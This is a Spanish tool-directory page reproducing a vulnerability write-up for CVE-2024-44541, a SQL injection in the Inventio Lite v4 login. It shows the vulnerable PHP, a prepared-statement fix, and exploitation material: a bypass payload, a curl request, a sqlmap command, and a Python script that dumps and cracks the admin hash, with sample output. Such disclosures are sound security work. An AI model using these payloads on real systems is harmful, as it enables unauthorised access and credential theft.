Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-44541 — Este repositorio detalla una vulnerabilidad de inyección SQL en Inventio Lite v4, incluyendo pasos de explotación y un script en Python para automatizar el ataque. Proporciona información sobre el código vulnerable, las correcciones recomendadas y cómo extraer y descifrar las credenciales administrativas. | Kitploit
Herramientas/GitHubGitHub/pointedsec/cve-2024-44541
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubpointedsec/cve-2024-44541

CVE-2024-44541

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

hace 1 añoAún no revisado

Este repositorio detalla una vulnerabilidad de inyección SQL en Inventio Lite v4, incluyendo pasos de explotación y un script en Python para automatizar el ataque. Proporciona información sobre el código vulnerable, las correcciones recomendadas y cómo extraer y descifrar las credenciales administrativas.

Compartir

CVE-2024-44541: Vulnerabilidad de Inyección SQL en Inventio Lite v4

Descripción

Inventio Lite v4 es vulnerable a Inyección SQL (SQLi) en el endpoint /action=processlogin. Esta vulnerabilidad permite a los atacantes inyectar consultas SQL arbitrarias a través del parámetro username en solicitudes POST, lo que potencialmente conduce a acceso no autorizado y extracción de datos.

Código vulnerable

El código vulnerable es el siguiente:

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();
    $sql = "select * from user where (email= \"".$user."\" or username= \"".$user."\") and password= \"".$pass."\" and is_active=1";
    $query = $con->query($sql);
    $found = false;
    $userid = null;
    while($r = $query->fetch_array()){
        $found = true;
        $userid = $r['id'];
    }
}

Captura de pantalla del código vulnerable: Vulnerable Code

Código corregido

El problema se soluciona usando sentencias preparadas:

root@kitploit:~
if(!isset($_SESSION["user_id"])) {
    $user = $_POST['username'];
    $pass = sha1(md5($_POST['password']));

    $base = new Database();
    $con = $base->connect();

    // Prepare the query
    $stmt = $con->prepare("
        SELECT * FROM user 
        WHERE (email = ? OR username = ?) 
        AND password = ? 
        AND is_active = 1
    ");

    // Bind parameters
    $stmt->bind_param("sss", $user, $user, $pass);

    // Execute query
    $stmt->execute();

    // Get result
    $result = $stmt->get_result();
    $found = false;
    $userid = null;

    while($r = $result->fetch_assoc()){
        $found = true;
        $userid = $r['id'];
    }

    // Close statement
    $stmt->close();
}

Explotación

Payload de bypass de autenticación

Para explotar esta vulnerabilidad, use el siguiente payload:

root@kitploit:~
user -> ") or 1=1-- - 
pass -> blablalba

Ejemplo del ataque usando curl:

root@kitploit:~
$ curl -X POST http://192.168.1.51/inventio-lite/?action=processlogin -d 'username=%22%29%20or%201%3D1--%20-&password=blablabla' -v && echo ""

Ejemplo con SQLMap

root@kitploit:~
$ sqlmap -u http://192.168.1.51/inventio-lite/?action=processlogin --data="username=*&password=*" --level 5 --risk 3 --dbms=mysql --dbs --prefix='")' --batch --dbs

Script de explotación

Para automatizar la explotación y extracción del nombre de usuario y hash de la contraseña del administrador, puede usar el script Python proporcionado, sqli.py.

Puede clonar este repositorio

root@kitploit:~
git clone https://github.com/pointedsec/CVE-2024-44541

Luego instale los requisitos con pip

root@kitploit:~
pip install -r requirements.txt

Modifique las siguientes variables en el script según sea necesario:

  • BASE_URL = "http://192.168.1.51/inventio-lite/"
  • PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"

Y ejecute el script; esto volcará el nombre de usuario y hash del Administrador, y luego intentará descifrar el hash con el formato SHA1(MD5(password)).

Ejemplo de salida:

root@kitploit:~
$ python3 sqli.py 
[*] Checking if target is vulnerable
[+] Target Vulnerable!
[*] Dumping Administrator username...
[◤] Extracting Username: -> [email protected]
[/] Extracting Admin Password Hash: Final Admin Hash: 90b9aa7e25f80cf4f64e990b78a9fc5ebd6cecad
[+] Password Decrypted! -> [email protected]:admin
[*] Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations

Impacto

Confidencialidad: Los atacantes pueden volcar toda la base de datos, exponiendo datos sensibles como credenciales de usuario e información personal.

Integridad: Los atacantes pueden eludir la autenticación y obtener acceso administrativo, permitiéndoles modificar o eliminar datos.

Referencias

  • Repositorio de GitHub de Inventio Lite
  • https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-44541
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44541
  • https://nvd.nist.gov/vuln/detail/CVE-2024-44541

Créditos

Este informe de vulnerabilidad fue identificado por Andrés Del Cerro. Para más detalles, contácteme en [email protected]


Descargar herramienta